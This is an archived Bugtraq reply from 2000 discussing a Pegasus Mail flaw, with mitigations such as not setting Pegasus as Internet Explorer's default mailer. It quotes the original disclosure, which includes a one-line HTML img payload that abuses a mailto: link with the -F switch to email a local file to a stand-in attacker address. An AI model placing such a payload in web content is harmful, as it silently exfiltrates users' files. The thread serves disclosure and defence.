Bugtraq mailing list archives
Re: Pegasus mail file reading vulnerability
From: George Bakos <alpinista () BIGFOOT COM>
Date: Wed, 4 Oct 2000 10:34:05 -0400
The temporary fix stated by Mr. Ghory affords only a brief dialog flash. Not a very good fix. A better one is to NOT configure Pegasus to be the default mailer for IE. This is, unfortunately a user specified option at install time, not the default. Also, queuing of outgoing mail allows for pre-delivery review. A pain, but until David supplies a fix, this is it. Be aware, the -F switch will only include a file in the body of a message; it will NOT attach a binary. The -B switch will accomplish this from the commandline, but not via IE. It seems this is more of an IE mailto: implementation issue more than a Pmail one. I wonder how many other apps you can pass commandline options to by exploiting this "feature". On 3 Oct 00, at 16:31, Imran Ghory wrote:
SUMMARY The default setup of Pegasus Mail contains a remotely exploitable security hole that allows a remote website to gain copies of files on the users hard drive. DETAILS Version tested: Pegasus Mail v3.12c with IE5.0 When the webpage containing the exploit code is viewed using IE5, Pegasus mail will automatically creates a message which has a copy of the file "c:\test.txt" and is addressed to "hacker () hakersite com" and queues it ready to be sent without any further user intervention If instead of "hacker () hakersite com" we have a local user, "hacker" the message won't be queued but just sent immediately. Exploit code: <img src="mailto:hacker () hakersite com -F c:\test.txt"> Temporary Fix: 1) Don't run Pegasus Mail at the same time as a web browser This is not a complete solution as Pegasus Mail will load up if the exploit code is run, but this at least will be more noticable to the user. Vendor: As I earlier posted a message to vuln-dev giving the basics of this exploit without the realizing the consequeces (at that stage the user had to click on a link for the exploit to come into play), I have decided to publish the full exploit before contacting the vendor. -- Imran Ghory
George Bakos - Security Engineer Electronic Warfare Associates Information & Infrastructure Technologies 802-338-3213 To request PGP public key, mailto:alpinista () bigfoot com?subject=sendpubkey or http://pgpkeys.mit.edu:11371/
Current thread:
- Pegasus mail file reading vulnerability Imran Ghory (Oct 03)
- Re: Pegasus mail file reading vulnerability George Bakos (Oct 04)
- Re: Pegasus mail file reading vulnerability Nick FitzGerald (Oct 04)
- <Possible follow-ups>
- Pegasus Mail file reading vulnerability Richard Stevenson (Oct 31)
- Re: Pegasus mail file reading vulnerability George Bakos (Oct 04)